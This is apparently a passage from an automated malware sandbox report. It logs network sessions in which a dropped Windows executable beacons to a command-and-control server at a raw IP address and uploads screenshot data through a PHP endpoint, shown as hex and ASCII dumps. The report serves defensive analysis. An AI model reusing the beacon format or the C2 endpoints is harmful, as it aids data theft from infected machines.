                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:15.272635937 CEST2657OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:15.272733927 CEST2669OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:15.272798061 CEST2671OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:15.272825003 CEST2674OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:15.309000969 CEST2679OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:15.309354067 CEST2685OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:15.309463024 CEST2690OUTData Raw: 1c a2 16 0a 36 95 e0 48 07 5a bf 79 7f a3 c5 e3 ab fd 76 2d 6e d2 e2 d6 f0 de 6d 48 a1 9c 48 9e 64 12 2a ee 0d 18 1c b3 01 c1 3d 7d 39 a7 ed ea 59 bb 7f 37 e1 b0 4a 85 3b d9 3e a6 24 1a 3c af 15 ec b7 57 16 f6 29 63 70 96 d7 26 e3 7f ee dd b7 e3
                                        Data Ascii: 6HZyv-nmHHd*=}9Y7J;>$<W)cp&V$,Wn|/,76yqs*d$v5U]r;eex+\kl)BD]:'h<7 I\KYhqOU2}.KqcMp4M*R6v6
                                        Aug 29, 2021 22:27:15.427400112 CEST2743INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:15 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        150192.168.2.44988946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:00.000924110 CEST11797OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:00.083905935 CEST11836INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:00 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        151192.168.2.44989046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:00.043370008 CEST11797OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642f
                                        Host: 46.17.96.36
                                        Content-Length: 110773
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:00.043436050 CEST11798OUTData Raw: 2d 2d 2d 2d 2d 2d 32 63 30 39 64 66 39 33 61 64 39 66 62 66 34 33 37 32 66 30 61 61 36 38 35 66 38 39 36 34 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2c09df93ad9fbf4372f0aa685f89642fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:00.043590069 CEST11808OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:00.043747902 CEST11810OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:00.079973936 CEST11813OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:00.080025911 CEST11830OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:00.080044031 CEST11833OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:00.080090046 CEST11836OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:28:00.119486094 CEST11841OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:00.119549990 CEST11865OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:28:00.119599104 CEST11868OUTData Raw: 4e 02 80 38 a7 01 4c 86 ce 97 c2 6b 98 f5 1f fa e4 3f 91 ae 74 f0 ed f5 ae a7 c1 f1 ee 83 53 3f f4 cb fa 1a e6 18 7c c7 eb 5c 14 25 fb fa 8b d0 ea ae ad 42 0f d4 6d 18 a5 c5 18 ae db 9c 37 12 9c 28 c5 00 50 20 a5 a5 c5 2e 3d aa 5b 10 98 a3 14 f0
                                        Data Ascii: N8Lk?tS?|\%Bm7(P .=[xF?AR[i?CU?H=9WeImd[k4>f)w5X*sJ1]/f@7yZKI/&:Z{77?/mZ_Z+
                                        Aug 29, 2021 22:28:00.229979992 CEST11909INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:00 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        152192.168.2.44989146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:00.239121914 CEST11909OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:00.317523003 CEST11910INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:00 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        153192.168.2.44989246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:00.465706110 CEST11910OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642f
                                        Host: 46.17.96.36
                                        Content-Length: 110773
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:00.465725899 CEST11911OUTData Raw: 2d 2d 2d 2d 2d 2d 32 63 30 39 64 66 39 33 61 64 39 66 62 66 34 33 37 32 66 30 61 61 36 38 35 66 38 39 36 34 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2c09df93ad9fbf4372f0aa685f89642fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:00.465894938 CEST11921OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:00.466006041 CEST11923OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:00.500761032 CEST11927OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:00.500900984 CEST11929OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:00.500914097 CEST11932OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:00.501029968 CEST11947OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:00.501223087 CEST11949OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:28:00.535797119 CEST11955OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:00.535834074 CEST11960OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:28:00.643048048 CEST12022INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:00 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        154192.168.2.44989346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:00.470861912 CEST11924OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:00.547666073 CEST12000INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:00 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        155192.168.2.44989446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:00.689237118 CEST12023OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:00.766000986 CEST12023INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:00 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        156192.168.2.44989546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:00.895920992 CEST12024OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642f
                                        Host: 46.17.96.36
                                        Content-Length: 110773
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:00.896096945 CEST12024OUTData Raw: 2d 2d 2d 2d 2d 2d 32 63 30 39 64 66 39 33 61 64 39 66 62 66 34 33 37 32 66 30 61 61 36 38 35 66 38 39 36 34 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2c09df93ad9fbf4372f0aa685f89642fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:00.896389961 CEST12034OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:00.896560907 CEST12037OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:00.930913925 CEST12046OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:00.931233883 CEST12063OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
